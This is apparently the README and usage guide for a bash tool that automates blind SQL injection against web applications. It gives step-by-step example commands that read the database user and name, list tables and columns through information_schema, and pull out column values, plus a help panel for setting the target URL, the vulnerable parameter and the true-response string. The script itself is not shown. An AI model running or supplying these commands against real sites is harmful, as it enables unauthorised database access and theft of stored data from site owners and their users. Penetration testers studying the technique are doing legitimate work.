This is a bash script made for automating the exploitation of Blind SQL Injection Vulnerabilities
HIGLY RECOMMENDED TO MAKE THE QUERY "@@version" TO SEE WHICH IS THE DATABASE VERSION TO SEND THE APPROPIATE QUERYS
CHANGE THE URL ON THE 5th line for the one that you want to use
CHANGE THE ?band=the offspring' of the 20th line for "? the vulnerable parameter=Xvalue' "
CHANGE THE truestring variable for the string you obtain when a normal query is well done.
bash blindSQLi.sh 20 "Select user()"
bash blindSQLi.sh 20 "Select database()" #show the actual database
bash blindSQLi.sh 20 "SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASEname' limit 0,1 " #show 1st table name of a database
bash blindSQLi.sh 20 "SELECT table_name FROM information_schema.tables WHERE table_schema='DATABASEname' limit 1,1 " #show 2nd table name of a database, and so on...
bash blindSQLi.sh 20 "SELECT column_name FROM information_schema.columns WHERE table_name='TABLEname' limit 0,1 " #show the 1st column name of a table.
bash blindSQLi.sh 20 "SELECT column_name FROM information_schema.columns WHERE table_name='TABLEname' limit 1,1 " #show the 2nd column name of a table and so on...
bash blindSQLi.sh 30 "SELECT concat(COLUMN1, '---', COLUMN2) FROM TABLEname limit 0,1 " #extract the 1st value of 2 columns from a table.
bash blindSQLi.sh 30 "SELECT concat(COLUMN1, '---', COLUMN2, '---', COLUMN3) FROM TABLEname limit 1,1 " #extract the 2nd value of 3 columns from a table and so on...
Where 20 is maximum of characters we expect from the response and what's inside the quotes is the query that you want to do.
You can use a query cheatsheet like the ones that are in the PentestMonkey webpage.
-u, --url The URL to query, f. ex: http://webpage.com/banddetails.php"
-i, --id The ID parameter to use in the URL, f. ex: ?band=20"
-t, --truestring The response that the web application shows when a request is successful, f. ex: We worked with them in the past"
-m, --maxlength The maximum length of the substring to extract, f. ex: 20"
-q, --query The SQL query to extract the substring from, see PentestMonkey SQL injection cheatsheets"
-h, --help Show this help panel"
./blind.sh -u http://webpage.com/banddetails.php -i "?band=20" -t "We worked with them in the past" -m 30 -q "Select user()"